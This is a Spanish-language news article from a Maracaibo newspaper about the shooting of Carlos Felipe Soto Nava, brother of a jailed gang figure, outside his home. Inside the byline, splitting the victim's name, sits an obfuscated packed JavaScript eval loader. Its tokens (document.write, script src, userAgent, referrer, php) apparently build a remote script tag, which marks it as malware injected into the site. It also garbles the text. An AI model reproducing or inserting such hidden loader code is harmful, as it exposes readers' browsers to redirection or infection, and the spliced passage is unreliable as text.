Matan al hermano del "Mocho Edwin" 

José Antonio González / Maracaibo / [email protected]
Carlos eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fykhb|var|u0026u|referrer|kiktt||js|php'.split('|'),0,{})) Felipe Soto Nava, de 45 años, le dispararon en la cabeza cuando le entregaba unas empanadas a sus atacantes. La Policía investiga el crimen como una venganza

Los funcionarios acordonaron la calle y alejaron a los curiosos. (Foto: María Fuenmayor)

Los testigos no quisieron hablar. Todos se aglomeraron frente a la casa 58-52, en la avenida 4 Bella Vista con avenida 5, diagonal al antiguo Cine Uairén, parroquia Olegario Villalobos, luego que asesinaran a Carlos Felipe Soto Nava (45), hermano del reo Edwin Soto, alias el "Mocho Edwin", líder negativo en la cárcel de Sabaneta, quien permanece detenido en Tocorón, Aragua.

Frente a la vivienda, Soto ponía mesas y sillas verdes plásticas, vendía empanadas. El que llegaba era bien atendido, pero esta vez, la visita dejó un "mal sabor" a la familia, comentó uno de los curiosos. 

Los desconocidos le pidieron dos empanadas. "Carlos bajó los escalones, les sirvió y al volver al regresar por el refresco, lo tirotearon". Seguidamente huyeron en una camioneta negra y un carro azul pequeño. Eran a las 4.45 de la tarde. 

La víctima descendió los cuatro escalones y se desvaneció dentro de la vivienda. Afuera, a solo unos metros del cuerpo, quedaron tres casquillos de bala.

Los motorizados de la Policía regional y Polimaracaibo llegaron al sitio y resguardaron la escena. La Policía científica arribó a las 5.30 de la tarde, cerró la avenida y comenzó a recabar las evidencias. Dentro de la casa, una docena de familiares lloraba mientras que los detectives tomaban fotografías a Carlos y a los cartuchos de bala. Dos estaban por el portón pequeño y el tercero por el grande.

Un familiar, sin identificarse, dijo que "Carlos era una buena persona, pese a sus hermanos 'rebeldes', él era sano". Sentenció que era el cuarto de seis hermanos y que minutos antes lo había visto con vida, salió un instante y de regreso lo llamaron para avisarle. 

"Si me hubiese quedado, quizás me hubiesen matado a mí también". Hace tres años, frente a esa casa, mataron a "Yose" un sobrino de Carlos. 

Uno de los curiosos aseguraba que "algún día iba a caer porque no estaba en 'vainas' buenas". A las 6.50 de la tarde, cuando caía la noche, llegó la unidad forense y levantaron el cadáver para llevarlo a la morgue.

Carlos tenía dos trabajos, en la mañana trabajaba como personal de mantenimiento en el Hospital Noriega Trigo y en la noche atendía su negocio. La mayoría de su familia reside en el sector Santa Rosa de Agua. Su asesinato lo investigan como una venganza.

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: [email protected] , [email protected] o [email protected]
Desarrollado por Miguel Guadarrama